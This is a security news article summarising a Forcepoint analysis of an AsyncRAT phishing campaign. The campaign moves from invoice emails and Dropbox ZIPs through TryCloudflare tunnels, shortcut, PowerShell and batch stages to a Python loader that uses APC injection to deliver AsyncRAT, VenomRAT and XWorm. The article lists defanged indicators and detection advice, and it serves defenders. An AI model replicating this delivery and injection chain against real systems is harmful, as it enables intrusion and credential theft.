AsyncRAT Campaign Uses TryCloudflare Tunnels and Python Loaders to Deliver Malware
An AsyncRAT malware campaign is using invoice-themed phishing emails, Dropbox downloads, TryCloudflare tunnels, shortcut files, PowerShell, JavaScript, batch scripts, and Python loaders to infect Windows systems. The goal is to install remote access malware while hiding the attack behind trusted cloud services and a fake invoice PDF.
The campaign does not rely on a single suspicious malware host. It moves through several stages, starting with a Dropbox-hosted ZIP file and then switching to temporary TryCloudflare infrastructure for additional payloads. This gives attackers disposable infrastructure that can be created and abandoned quickly.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
A Forcepoint X-Labs analysis found that the infection chain ultimately uses a Python script named load.py and five binary files to inject malware into legitimate Windows processes. The final payloads include AsyncRAT, while some branches also deliver VenomRAT and XWorm.
How the AsyncRAT Campaign Starts
The attack begins with a phishing email that looks like an invoice notice. In the sample analyzed by researchers, a German-language button labeled โRechnung herunterladen,โ meaning โdownload invoice,โ hid a Dropbox link that delivered the first ZIP archive.
Inside the ZIP file, attackers placed an internet shortcut file. When opened, that shortcut connected to a TryCloudflare-hosted WebDAV location and retrieved an LNK file, which then launched PowerShell to pull a JavaScript file from the same tunnel.
Cloudflare says TryCloudflare quick tunnels let developers test Cloudflare Tunnel without adding a site to Cloudflare DNS. Attackers abuse that convenience because a random trycloudflare.com subdomain can look less suspicious than an unknown standalone domain.
Attack Chain at a Glance
| Stage | File or service | Purpose |
|---|---|---|
| 1. Phishing lure | Invoice email | Tricks the user into clicking a download button. |
| 2. Initial download | Dropbox ZIP file | Delivers the first archive with an internet shortcut. |
| 3. Redirection | .URL file | Connects to a TryCloudflare WebDAV path. |
| 4. Execution | LNK and PowerShell | Downloads a JavaScript file from the same tunnel. |
| 5. Dropper | JavaScript and BAT file | Downloads the Python package and opens a decoy PDF. |
| 6. Loader | load.py and BIN files | Injects RAT payloads into legitimate Windows processes. |
The JavaScript stage retrieves an obfuscated batch file. That batch file carries out the main setup work by opening a fake invoice PDF for distraction, downloading a second ZIP archive, extracting it, checking whether Python is available, and running the Python loader.
The campaignโs use of a visible PDF matters because it reduces suspicion. The victim sees a document open after clicking the invoice link, while the real infection chain continues in the background.
Python Loader Runs the Final Payload
The second ZIP file contains many files that look like ordinary Python setup components. Forcepoint found that only load.py and five BIN files were malicious, which helps bury the important payloads inside a larger folder structure.
The loader uses Python ctypes, a standard library module that can call functions from DLLs and shared libraries. In this case, the script uses Windows API calls for memory allocation, memory copying, thread creation, and execution control.
The malware then uses APC injection to run shellcode inside other processes. Forcepoint described this as Early Bird APC Queue injection because the code gets placed into a new process before the main thread begins normal execution.
Payloads Include AsyncRAT, VenomRAT and XWorm
Different BIN files lead to different malware payloads. One file injects VenomRAT into notepad.exe, another injects XWorm, and the remaining files inject AsyncRAT shellcode into explorer.exe.
AsyncRAT gives attackers remote control over infected devices and can support spying, command execution, credential theft, and data collection. VenomRAT and XWorm offer similar remote access and information theft capabilities, which makes the campaign useful for broader cybercrime activity.

The payloads communicate with the same command-and-control infrastructure over different ports, including traffic to 62.60.190[.]141 on ports 3232 and 4056. A second server, 62.60.190[.]196, also appeared in the published indicators.
Why TryCloudflare Abuse Keeps Appearing
This campaign fits a broader trend of attackers abusing trusted tunneling and cloud services. Proofpoint research previously tracked financially motivated campaigns that abused Cloudflare Tunnels to deliver remote access trojans, including XWorm, AsyncRAT, VenomRAT, GuLoader, and Remcos.
A related Trend Micro MDR report in January 2026 also described AsyncRAT activity that used Cloudflare free-tier infrastructure, Dropbox links, legitimate Python environments, and decoy PDF files to reduce detection.
Attackers benefit from this model because many defenders cannot simply block trusted services for every user. Instead, they need to inspect behavior, file types, command lines, and unusual connections that follow a click.
What Defenders Should Watch For
- Invoice-themed emails that link to Dropbox archives or other file-sharing services.
- ZIP files that contain .URL, .LNK, .JS, .BAT, .WSH, or double-extension files.
- PowerShell launched by shortcut files, script files, or Microsoft Office processes.
- Connections to random trycloudflare.com subdomains after an email click.
- Python folders dropped into temporary or user-writable directories.
- Explorer.exe or notepad.exe launching suspicious network traffic after script execution.
The Forcepoint report says customer protections covered several stages of the chain, including lure attachments, redirect URLs, dropper files, and call-home traffic. It also noted that Forcepoint NGFW can terminate LNK file transfers and suspicious PowerShell user-agent connections when inspection is enabled.
Defenders should combine gateway controls with endpoint logging. PowerShell logging, script block logging, command-line auditing, and detection for shortcut-file execution can reveal activity before the RAT finishes installation.
Indicators of Compromise
The following indicators came from the public analysis and should support threat hunting. Teams should use them with behavior-based detections because tunnel domains and payload locations can change quickly.
| Type | Indicator | Description |
|---|---|---|
| Host | inventory-card-thumbzilla-ip[.]trycloudflare[.]com/DE/ | TryCloudflare location used to host the LNK stage |
| Host | mercy-synopsis-notify-motels[.]trycloudflare[.]com/ma[.]zip | TryCloudflare location used to deliver the Python package |
| Host | sufficiently-points-est-minimize[.]trycloudflare[.]com/ma[.]zip | Alternate TryCloudflare location for the Python package |
| C2 IP | 62.60.190[.]141 | Command-and-control server contacted over ports 3232 and 4056 |
| C2 IP | 62.60.190[.]196 | Secondary command-and-control server |
| File hash | 4747ee49bdf31351c025049d8c3b7fef831be77c | load.py Python loader |
| File hash | 0aa1b8fba8d7bd19a0064edfdf86c027da253644 | LNK file that triggers the PowerShell stage |
| File hash | cd61de9e4003ba568ae76f064935addb106a6d6d | Obfuscated batch file that downloads the Python package |
How to Reduce Exposure
Organizations should block or detonate shortcut files and script files delivered through email or downloaded archives. They should also apply stricter inspection to file-sharing links when a message uses invoice, payment, purchase order, or delivery themes.

The Proofpoint findings show that many related campaigns use internet shortcut files, WebDAV, LNK or VBS files, BAT or CMD scripts, and Python installers. Blocking one stage may not stop every variant, so layered detection matters.
The Trend Micro analysis also shows why defenders should review Dropbox downloads, TryCloudflare connections, startup persistence, and script-driven Python execution together instead of treating each event as isolated.

Bottom Line
The campaign shows how attackers can turn everyday cloud and developer services into malware delivery infrastructure. Dropbox hosts the first archive, TryCloudflare serves later stages, Python runs the loader, and legitimate Windows processes hide the final payload.
For security teams, the most important signal is not just the domain name. The suspicious pattern comes from the chain of events: an invoice email, a compressed archive, a shortcut file, a script interpreter, PowerShell, a Python loader, and injected code.
The Cloudflare TryCloudflare documentation explains the legitimate purpose of quick tunnels, while the Python ctypes documentation and MITRE ATT&CK mapping help explain why the loader can interact with low-level Windows functions and inject code into other processes.
FAQ
It is a malware campaign that uses invoice phishing emails, Dropbox downloads, TryCloudflare tunnels, script files, and Python loaders to deliver AsyncRAT and other remote access trojans.
The attack starts with a phishing email that links to a Dropbox ZIP file. The ZIP contains an internet shortcut that connects to TryCloudflare infrastructure and starts the next malware stages.
Attackers use TryCloudflare tunnels because they provide temporary cloud-hosted subdomains that can appear more trustworthy than unknown malware servers and can be rotated quickly.
The Python loader runs load.py and processes several BIN files. It uses Windows API calls to place shellcode into legitimate processes such as explorer.exe and notepad.exe.
Organizations should monitor invoice-themed phishing, ZIP files with shortcut or script files, PowerShell launched from LNK files, random trycloudflare.com connections, suspicious Python execution, and unusual network traffic from explorer.exe or notepad.exe.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
User forum
0 messages